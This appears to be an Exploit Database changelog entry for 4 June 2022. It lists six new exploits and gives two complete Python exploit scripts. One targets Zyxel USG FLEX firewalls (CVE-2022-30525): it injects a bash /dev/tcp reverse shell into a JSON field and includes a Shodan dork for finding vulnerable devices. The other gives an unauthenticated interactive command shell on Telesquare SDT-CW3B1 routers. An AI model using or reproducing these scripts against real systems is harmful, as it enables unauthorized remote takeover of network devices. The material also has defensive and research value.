DB: 2022-06-04

7 changes to exploits/shellcodes

Zyxel USG FLEX 5.21 - OS Command Injection
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
SolarView Compact 6.00 - Directory Traversal
Contao 4.13.2 - Cross-Site Scripting (XSS)
Microweber CMS 1.2.15 - Account Takeover

Author: Offensive Security

exploits/hardware/remote/50946.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
+# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
+# Date: May 18th 2022
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://www.zyxel.com
+# Version: ZLD5.00 thru ZLD5.21
+# Tested on: Linux
+# CVE: CVE-2022-30525
+
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import sys
+import json
+import base64
+import requests
+import argparse
+
+
+parser = argparse.ArgumentParser(
+    prog="CVE-2022-30525.py",
+    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
+)
+parser.add_argument("-u", dest="url", help="Specify target URL")
+parser.add_argument("-r", dest="host", help="Specify Remote host")
+parser.add_argument("-p", dest="port", help="Specify Remote port")
+
+args = parser.parse_args()
+
+banner = (
+    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
+    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
+    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
+    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
+    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
+    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
+    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
+    "biA6KSApCg=="
+)
+
+
+def main():
+
+    print("\n" + base64.b64decode(banner).decode("utf-8"))
+
+    if None in vars(args).values():
+        print(f"[!] Please enter all parameters !")
+        parser.print_help()
+        sys.exit()
+
+    if "http" not in args.url:
+        args.url = "https://" + args.url
+    args.url += "/ztp/cgi-bin/handler"
+    exploit(args.url, args.host, args.port)
+
+
+def exploit(url, host, port):
+    headers = {
+        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
+        "Content-Type": "application/json",
+    }
+
+    data = {
+        "command": "setWanPortSt",
+        "proto": "dhcp",
+        "port": "4",
+        "vlan_tagged": "1",
+        "vlanid": "5",
+        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
+        "data": "hi",
+    }
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
+
+    try:
+        response = requests.post(
+            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
+        )
+    except (KeyboardInterrupt, requests.exceptions.Timeout):
+        print("[!] Bye Bye hekcer !")
+        sys.exit(1)
+    finally:
+
+        try:
+            print("[!] Can't exploit the target ! Code :", response.status_code)
+
+        except:
+            print("[!] Enjoy your shell !!!")
+
+
+if __name__ == "__main__":
+    main()

exploits/hardware/remote/50948.py

@@ -0,0 +1,97 @@
+#!/usr/bin/python3
+
+# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
+# Date: 24th May 2022
+# Exploit Author: Bryan Leong <NobodyAtall>
+# Vendor Homepage: http://telesquare.co.kr/
+# CVE : CVE-2021-46422
+# Authentication Required: No
+
+import requests
+import argparse
+import sys
+from xml.etree import ElementTree
+
+def sysArgument():
+	ap = argparse.ArgumentParser()
+	ap.add_argument("--host", required=True, help="target hostname/IP")
+	args = vars(ap.parse_args())
+	return args['host']
+
+def checkHost(host):
+	url = "http://" + host
+
+	print("[*] Checking host is it alive?")
+
+	try:
+		rsl = requests.get(url)
+		print("[*] The host is alive.")
+	except requests.exceptions.Timeout as err:
+		raise SystemExit(err)
+
+def exploit(host):
+	url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
+
+	#checking does the CGI exists?
+	rsl = requests.get(url)
+
+	if(rsl.status_code == 200):
+		print("[*] CGI script exist!")
+		print("[*] Injecting some shell command.")
+
+		#1st test injecting id command
+		cmd = "id"
+
+		try:
+			rsl = requests.get(url + cmd, stream=True)
+			xmlparser = ElementTree.iterparse(rsl.raw)
+
+			cmdRet = []
+
+			for event, elem in xmlparser:
+				if(elem.tag == 'CmdResult'):
+					cmdRet.append(elem.text)
+		except:
+			print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
+			sys.exit(0)
+
+		if(len(cmdRet) != 0):
+			print("[*] There's response from the CGI script!")
+			print('[*] System ID: ' + cmdRet[0].strip())
+
+			print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
+			#start shell iteration
+			while(True):
+				cmdInput = input("[SDT-CW3B1 Shell]# ")
+
+				if(cmdInput == ".exit"):
+					print("[*] Exiting shell.")
+					sys.exit(0)
+
+				rsl = requests.get(url + cmdInput, stream=True)
+				xmlparser = ElementTree.iterparse(rsl.raw)
+
+
+				for event, elem in xmlparser:
+					if(elem.tag == 'CmdResult'):
+						print(elem.text.strip())
+
+				print('\n')
+
+		else:
+			print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
+			sys.exit(0)
+
+	else:
+		print("[!] CGI script not found.")
+		print(rsl.status_code)
+		sys.exit(0)
+
+def main():
+	host = sysArgument()
+
+	checkHost(host)
+	exploit(host)
+
+if  __name__ == "__main__":
+	main()